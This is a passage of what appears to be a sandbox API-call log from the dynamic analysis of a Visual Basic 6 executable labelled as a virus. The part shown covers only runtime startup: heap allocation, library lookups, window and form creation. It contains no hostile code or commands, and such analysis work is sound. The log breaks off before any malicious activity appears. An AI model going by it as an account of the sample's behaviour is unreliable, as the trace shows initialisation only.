lpWndClass=0x28fbcc) returned 0 [0083.435] RegisterClassA (lpWndClass=0x28fbcc) returned 0x4ac1bf [0083.435] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x28fbcc | out: lpWndClass=0x28fbcc) returned 0 [0083.435] RegisterClassA (lpWndClass=0x28fbcc) returned 0x4ac1c0 [0083.435] HeapCreate (flOptions=0x0, dwInitialSize=0x400, dwMaximumSize=0x0) returned 0x3cd0000 [0083.436] GetUserDefaultLCID () returned 0x409 [0083.436] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x3a4) returned 0x30f1810 [0083.436] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x3a4) returned 0x30f1bc0 [0083.436] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xd4) returned 0x30f1f70 [0083.437] GetSystemInfo (in: lpSystemInfo=0x28fb8c | out: lpSystemInfo=0x28fb8c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06)) [0083.437] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x3e0000 [0083.437] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.437] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.438] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.438] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.438] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.438] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0083.439] VirtualProtect (in: lpAddress=0x3e0000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x28fbe8 | out: lpflOldProtect=0x28fbe8*=0x4) returned 1 [0083.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3e0000, dwSize=0x6000) returned 1 [0083.440] GlobalAddAtomA (lpString="VBDisabled") returned 0xc164 [0083.441] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="oleaut32.dll", cbMultiByte=12, lpWideCharStr=0x28eb48, cchWideChar=2047 | out: lpWideCharStr="oleaut32.dll\x18") returned 12 [0083.441] SysReAllocStringLen (in: pbstr=0x28fb4c*=0x0, psz="oleaut32.dll", len=0xc | out: pbstr=0x28fb4c*="oleaut32.dll") returned 1 [0083.441] CharLowerBuffW (in: lpsz="oleaut32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0083.441] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x775d0000 [0083.442] GetProcAddress (hModule=0x775d0000, lpProcName="DispCallFunc") returned 0x775e3dcf [0083.442] GetProcAddress (hModule=0x775d0000, lpProcName="LoadTypeLibEx") returned 0x775e07b7 [0083.442] GetProcAddress (hModule=0x775d0000, lpProcName="UnRegisterTypeLib") returned 0x77601ca9 [0083.443] GetProcAddress (hModule=0x775d0000, lpProcName="CreateTypeLib2") returned 0x775e8e70 [0083.443] GetProcAddress (hModule=0x775d0000, lpProcName="VarDateFromUdate") returned 0x775e7684 [0083.443] GetProcAddress (hModule=0x775d0000, lpProcName="VarUdateFromDate") returned 0x775ecc98 [0083.443] GetProcAddress (hModule=0x775d0000, lpProcName="GetAltMonthNames") returned 0x7761903a [0083.444] GetProcAddress (hModule=0x775d0000, lpProcName="VarNumFromParseNum") returned 0x775e6231 [0083.444] GetProcAddress (hModule=0x775d0000, lpProcName="VarParseNumFromStr") returned 0x775e5fea [0083.444] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromR4") returned 0x775f3f94 [0083.445] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromR8") returned 0x775f4e9e [0083.445] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromDate") returned 0x7761db72 [0083.445] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromI4") returned 0x77602a8c [0083.445] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromCy") returned 0x7761d737 [0083.446] GetProcAddress (hModule=0x775d0000, lpProcName="VarR4FromDec") returned 0x7761e015 [0083.446] GetProcAddress (hModule=0x775d0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7761cc3d [0083.446] GetProcAddress (hModule=0x775d0000, lpProcName="GetRecordInfoFromGuids") returned 0x7761d1c4 [0083.446] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayGetRecordInfo") returned 0x7761d48c [0083.447] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArraySetRecordInfo") returned 0x7761d4c6 [0083.447] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayGetIID") returned 0x7761d509 [0083.447] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArraySetIID") returned 0x775ee7bb [0083.448] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayCopyData") returned 0x775ee496 [0083.448] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x775eddf1 [0083.448] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayCreateEx") returned 0x7761d53f [0083.448] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormat") returned 0x77622055 [0083.449] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatDateTime") returned 0x776220ea [0083.449] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatNumber") returned 0x77622151 [0083.449] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatPercent") returned 0x776221f5 [0083.449] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatCurrency") returned 0x77622288 [0083.450] GetProcAddress (hModule=0x775d0000, lpProcName="VarWeekdayName") returned 0x77622335 [0083.450] GetProcAddress (hModule=0x775d0000, lpProcName="VarMonthName") returned 0x776223d5 [0083.450] GetProcAddress (hModule=0x775d0000, lpProcName="VarAdd") returned 0x775f5934 [0083.450] GetProcAddress (hModule=0x775d0000, lpProcName="VarAnd") returned 0x775f5a98 [0083.451] GetProcAddress (hModule=0x775d0000, lpProcName="VarCat") returned 0x775f59b4 [0083.451] GetProcAddress (hModule=0x775d0000, lpProcName="VarDiv") returned 0x7764e405 [0083.451] GetProcAddress (hModule=0x775d0000, lpProcName="VarEqv") returned 0x7764ef07 [0083.451] GetProcAddress (hModule=0x775d0000, lpProcName="VarIdiv") returned 0x7764f00a [0083.452] GetProcAddress (hModule=0x775d0000, lpProcName="VarImp") returned 0x7764ef47 [0083.452] GetProcAddress (hModule=0x775d0000, lpProcName="VarMod") returned 0x7764f15e [0083.453] GetProcAddress (hModule=0x775d0000, lpProcName="VarMul") returned 0x7764dbd4 [0083.453] GetProcAddress (hModule=0x775d0000, lpProcName="VarOr") returned 0x7764ecfa [0083.453] GetProcAddress (hModule=0x775d0000, lpProcName="VarPow") returned 0x7764ea66 [0083.453] GetProcAddress (hModule=0x775d0000, lpProcName="VarSub") returned 0x7764d332 [0083.454] GetProcAddress (hModule=0x775d0000, lpProcName="VarXor") returned 0x7764ee2e [0083.456] GetProcAddress (hModule=0x775d0000, lpProcName="VarAbs") returned 0x7764ca11 [0083.456] GetProcAddress (hModule=0x775d0000, lpProcName="VarFix") returned 0x7764cc5f [0083.457] GetProcAddress (hModule=0x775d0000, lpProcName="VarInt") returned 0x7764cde7 [0083.457] GetProcAddress (hModule=0x775d0000, lpProcName="VarNeg") returned 0x7764c802 [0083.457] GetProcAddress (hModule=0x775d0000, lpProcName="VarNot") returned 0x7764ec66 [0083.458] GetProcAddress (hModule=0x775d0000, lpProcName="VarRound") returned 0x7764d155 [0083.458] GetProcAddress (hModule=0x775d0000, lpProcName="VarCmp") returned 0x775eb0dc [0083.458] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecAdd") returned 0x77605f3e [0083.458] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecCmp") returned 0x775f4fd0 [0083.459] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrCat") returned 0x775f0d2c [0083.459] GetProcAddress (hModule=0x775d0000, lpProcName="VarCyMulI4") returned 0x776059ed [0083.459] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrCmp") returned 0x775df8b8 [0083.459] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ole32.dll", cbMultiByte=9, lpWideCharStr=0x28eb54, cchWideChar=2047 | out: lpWideCharStr="ole32.dll(\x0c") returned 9 [0083.460] SysReAllocStringLen (in: pbstr=0x28fb58*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x28fb58*="ole32.dll") returned 1 [0083.460] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0083.460] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76c60000 [0083.461] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstanceEx") returned 0x76ca9d4e [0083.461] GetProcAddress (hModule=0x76c60000, lpProcName="CLSIDFromProgIDEx") returned 0x76c70782 [0083.461] GetSystemMetrics (nIndex=42) returned 0 [0083.462] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x76da66bc) returned 0x0 [0083.462] IMalloc:Alloc (This=0x76da66bc, cb=0x4) returned 0xe43238 [0083.462] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f900, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0083.463] lstrcatA (in: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe.cfg") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe.cfg" [0083.463] SetLastError (dwErrCode=0x0) [0083.463] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x28f7fc, lpFilePart=0x28f7d0 | out: lpBuffer="\x14ú(", lpFilePart=0x28f7d0*="\x8bÿU\x8bì\x83ì\x14S\x8b]\x0cV\x8bs\x0835¬\x03¶uW\x8b\x06ÆEÿ") returned 0x0 [0083.464] SetLastError (dwErrCode=0x2) [0083.464] GetLastError () returned 0x2 [0083.464] lstrcmpiA (lpString1="2a29d10ec3310613657d8a0dcaa4aabe.virus", lpString2="MTX") returned -1 [0083.464] lstrcmpiA (lpString1="2a29d10ec3310613657d8a0dcaa4aabe.virus", lpString2="DLLHOST") returned -1 [0083.464] lstrcmpiA (lpString1="2a29d10ec3310613657d8a0dcaa4aabe.virus", lpString2="INETINFO") returned -1 [0083.464] lstrcmpiA (lpString1="2a29d10ec3310613657d8a0dcaa4aabe.virus", lpString2="W3WP") returned -1 [0083.464] lstrcmpiA (lpString1="2a29d10ec3310613657d8a0dcaa4aabe.virus", lpString2="ASPNET_WP") returned -1 [0083.464] lstrcmpiA (lpString1="2a29d10ec3310613657d8a0dcaa4aabe.virus", lpString2="DLLHST3G") returned -1 [0083.464] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f8f4, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0083.464] lstrcmpiA (lpString1="2a29d10ec3310613657d8a0dcaa4aabe.virus", lpString2="IEXPLORE") returned -1 [0083.464] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="SXS.DLL", cbMultiByte=7, lpWideCharStr=0x28eb90, cchWideChar=2047 | out: lpWideCharStr="SXS.DLLDLL") returned 7 [0083.465] SysReAllocStringLen (in: pbstr=0x28fb94*=0x0, psz="SXS.DLL", len=0x7 | out: pbstr=0x28fb94*="SXS.DLL") returned 1 [0083.465] CharLowerBuffW (in: lpsz="SXS.DLL", cchLength=0x7 | out: lpsz="sxs.dll") returned 0x7 [0083.465] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x72ec0000 [0083.474] GetLastError () returned 0x0 [0083.474] SetLastError (dwErrCode=0x0) [0083.474] GetLastError () returned 0x0 [0083.474] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x72f07685 [0083.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x28fe40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0083.475] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x1c) returned 0x30f2050 [0083.475] CoRegisterMessageFilter (in: lpMessageFilter=0x30f2054, lplpMessageFilter=0x30f205c | out: lplpMessageFilter=0x30f205c*=0x0) returned 0x0 [0083.475] IUnknown:AddRef (This=0x30f2054) returned 0x2 [0083.476] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x28fe10 | out: lpwcx=0x28fe10) returned 0 [0083.476] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x30355 [0083.479] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="USER32", cbMultiByte=6, lpWideCharStr=0x28eda8, cchWideChar=2047 | out: lpWideCharStr="USER32(በC︬(\x0c") returned 6 [0083.479] SysReAllocStringLen (in: pbstr=0x28fdac*=0x0, psz="USER32", len=0x6 | out: pbstr=0x28fdac*="USER32") returned 1 [0083.479] CharLowerBuffW (in: lpsz="USER32", cchLength=0x6 | out: lpsz="user32") returned 0x6 [0083.479] GetModuleHandleA (lpModuleName="USER32") returned 0x75980000 [0083.480] GetProcAddress (hModule=0x75980000, lpProcName="GetSystemMetrics") returned 0x75997d2f [0083.480] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromWindow") returned 0x759a3150 [0083.480] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromRect") returned 0x759be7a0 [0083.481] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromPoint") returned 0x759a5281 [0083.481] GetProcAddress (hModule=0x75980000, lpProcName="EnumDisplayMonitors") returned 0x759a451a [0083.481] GetProcAddress (hModule=0x75980000, lpProcName="GetMonitorInfoA") returned 0x759a4413 [0083.481] GetSystemMetrics (nIndex=0) returned 1440 [0083.481] GetSystemMetrics (nIndex=78) returned 1440 [0083.481] GetSystemMetrics (nIndex=1) returned 900 [0083.481] GetSystemMetrics (nIndex=79) returned 900 [0083.481] GetSystemMetrics (nIndex=50) returned 16 [0083.481] GetSystemMetrics (nIndex=49) returned 16 [0083.482] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0xc0357 [0083.482] RegisterClassExA (param_1=0x28fe10) returned 0x11c1c2 [0083.482] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x6006a [0083.484] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x81, wParam=0x0, lParam=0x28f9f4) returned 0x1 [0083.488] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x83, wParam=0x0, lParam=0x28f9e0) returned 0x0 [0083.489] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x1, wParam=0x0, lParam=0x28f9f4) returned 0x0 [0083.489] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0083.489] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0083.489] MonitorFromWindow (hwnd=0x6006a, dwFlags=0x2) returned 0x10001 [0083.489] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x28fe18 | out: lpmi=0x28fe18) returned 1 [0083.489] SetWindowPos (hWnd=0x6006a, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0083.489] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x46, wParam=0x0, lParam=0x28fdb8) returned 0x0 [0083.490] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x47, wParam=0x0, lParam=0x28fdb8) returned 0x0 [0083.490] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0083.491] ShowWindow (hWnd=0x6006a, nCmdShow=4) returned 0 [0083.491] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.492] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x46, wParam=0x0, lParam=0x28fdcc) returned 0x0 [0083.493] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x47, wParam=0x0, lParam=0x28fdcc) returned 0x0 [0083.493] GetWindowThreadProcessId (in: hWnd=0x6006a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf38 [0083.493] VirtualQuery (in: lpAddress=0x28fe40, lpBuffer=0x28fe24, dwLength=0x1c | out: lpBuffer=0x28fe24*(BaseAddress=0x28f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0083.494] GetUserDefaultLCID () returned 0x409 [0083.494] IsValidCodePage (CodePage=0x3a4) returned 1 [0083.498] IsValidCodePage (CodePage=0x3b5) returned 1 [0083.499] IsValidCodePage (CodePage=0x3b6) returned 1 [0083.501] IsValidCodePage (CodePage=0x3a8) returned 1 [0083.512] GetUserDefaultLangID () returned 0x409 [0083.512] GetSystemDefaultLangID () returned 0xe30409 [0083.512] GetSystemMetrics (nIndex=42) returned 0 [0083.512] IMalloc:Alloc (This=0x76da66bc, cb=0xa8) returned 0xe44aa8 [0083.512] IMalloc:GetSize (This=0x76da66bc, pv=0xe44aa8) returned 0xa8 [0083.512] IMalloc:Alloc (This=0x76da66bc, cb=0xc) returned 0xe3ec50 [0083.512] GetCurrentThreadId () returned 0xf38 [0083.512] IMalloc:Alloc (This=0x76da66bc, cb=0x3c) returned 0xe36f38 [0083.512] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0xe4a2b8 [0083.514] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x28fe0c | out: phkResult=0x28fe0c*=0x0) returned 0x2 [0083.515] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0xe4a2e0 [0083.515] GetCurrentThreadId () returned 0xf38 [0083.515] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0xf38) returned 0x802cb [0083.515] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x14) returned 0x30f2078 [0083.515] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x80) returned 0x30f2098 [0083.515] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x10) returned 0x30f2120 [0083.516] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x2c) returned 0x30f2138 [0083.516] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x28fd64 | out: lpWndClass=0x28fd64) returned 0 [0083.516] RegisterClassA (lpWndClass=0x28fd64) returned 0x1bc1c3 [0083.516] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x301fa [0083.516] NtdllDefWindowProc_A (hWnd=0x301fa, Msg=0x81, wParam=0x0, lParam=0x28f9a0) returned 0x1 [0083.517] NtdllDefWindowProc_A (hWnd=0x301fa, Msg=0x83, wParam=0x0, lParam=0x28f98c) returned 0x0 [0083.517] NtdllDefWindowProc_A (hWnd=0x301fa, Msg=0x1, wParam=0x0, lParam=0x28f9a0) returned 0x0 [0083.517] NtdllDefWindowProc_A (hWnd=0x301fa, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0083.517] NtdllDefWindowProc_A (hWnd=0x301fa, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0083.518] SetWindowLongA (hWnd=0x301fa, nIndex=0, dwNewLong=51323036) returned 0 [0083.518] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x38) returned 0x30f2170 [0083.518] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x30f21b0 [0083.518] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x10) returned 0x30f21d0 [0083.518] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0083.518] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0083.518] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0083.518] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0083.519] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0083.519] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0083.519] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0083.519] CreateCompatibleDC (hdc=0x0) returned 0x13010b28 [0083.519] GetCurrentObject (hdc=0x13010b28, type=0x7) returned 0x185000f [0083.519] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x6006a, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x50066 [0083.520] NtdllDefWindowProc_A (hWnd=0x50066, Msg=0x81, wParam=0x0, lParam=0x28fa30) returned 0x1 [0083.520] NtdllDefWindowProc_A (hWnd=0x50066, Msg=0x83, wParam=0x0, lParam=0x28fa1c) returned 0x0 [0083.520] NtdllDefWindowProc_A (hWnd=0x50066, Msg=0x1, wParam=0x0, lParam=0x28fa30) returned 0x0 [0083.520] NtdllDefWindowProc_A (hWnd=0x50066, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0083.521] NtdllDefWindowProc_A (hWnd=0x50066, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0083.521] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0x210, wParam=0x1, lParam=0x50066) returned 0x0 [0083.521] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x18) returned 0x30f21e8 [0083.521] RtlAllocateHeap (HeapHandle=0x3cd0000, Flags=0x8, Size=0x114) returned 0x3cd07d0 [0083.521] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x5c) returned 0x30f2208 [0083.521] GetCurrentThreadId () returned 0xf38 [0083.521] GetCurrentThreadId () returned 0xf38 [0083.522] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x10) returned 0x30f2270 [0083.522] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x30) returned 0x30f2288 [0083.522] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x434) returned 0x30f22c0 [0083.522] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x434) returned 0x30f2700 [0083.522] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x3c) returned 0x30f2b40 [0083.522] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f2b88 [0083.522] lstrlenA (lpString="VB") returned 2 [0083.522] lstrlenA (lpString="PictureBox") returned 10 [0083.523] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xe) returned 0x30f2ca8 [0083.523] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x16c) returned 0x30f2cc0 [0083.524] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x68) returned 0x30f2e38 [0083.524] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x2c8) returned 0x30f2ea8 [0083.524] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x28) returned 0x30f3178 [0083.524] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f31a8 [0083.525] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x28) returned 0x30f31c8 [0083.525] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f31f8 [0083.525] lstrlenA (lpString="VB") returned 2 [0083.525] lstrlenA (lpString="TextBox") returned 7 [0083.525] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xb) returned 0x30f3318 [0083.525] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x38) returned 0x30f3330 [0083.525] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x120) returned 0x30f3370 [0083.525] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x60) returned 0x30f3498 [0083.525] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x250) returned 0x30f3500 [0083.525] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f3758 [0083.525] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f3778 [0083.526] lstrlenA (lpString="VB") returned 2 [0083.526] lstrlenA (lpString="CommandButton") returned 13 [0083.526] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x11) returned 0x30f3898 [0083.527] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x28) returned 0x30f38b8 [0083.527] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xd4) returned 0x30f38e8 [0083.527] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x44) returned 0x30f39c8 [0083.528] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1c8) returned 0x30f3a18 [0083.528] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f3be8 [0083.529] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f3c08 [0083.529] lstrlenA (lpString="VB") returned 2 [0083.529] lstrlenA (lpString="Timer") returned 5 [0083.529] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x9) returned 0x30f3d28 [0083.529] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xc) returned 0x30f3d40 [0083.529] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x30) returned 0x30f3d58 [0083.529] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x4) returned 0x30f3d90 [0083.529] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x9c) returned 0x30f3da0 [0083.529] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f3e48 [0083.530] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f3e68 [0083.530] lstrlenA (lpString="VB") returned 2 [0083.530] lstrlenA (lpString="Printer") returned 7 [0083.530] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0xb) returned 0x30f3f88 [0083.530] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xdc) returned 0x30f3fa0 [0083.530] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x30f4088 [0083.530] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x114) returned 0x30f40a8 [0083.530] lstrlenA (lpString="VB") returned 2 [0083.531] lstrlenA (lpString="Form") returned 4 [0083.531] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x8) returned 0x30f41c8 [0083.531] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x184) returned 0x30f41d8 [0083.531] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x7c) returned 0x30f4368 [0083.531] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x2f8) returned 0x30f43f0 [0083.531] RtlReAllocateHeap (Heap=0x30f0000, Flags=0x0, Ptr=0x30f3178, Size=0x50) returned 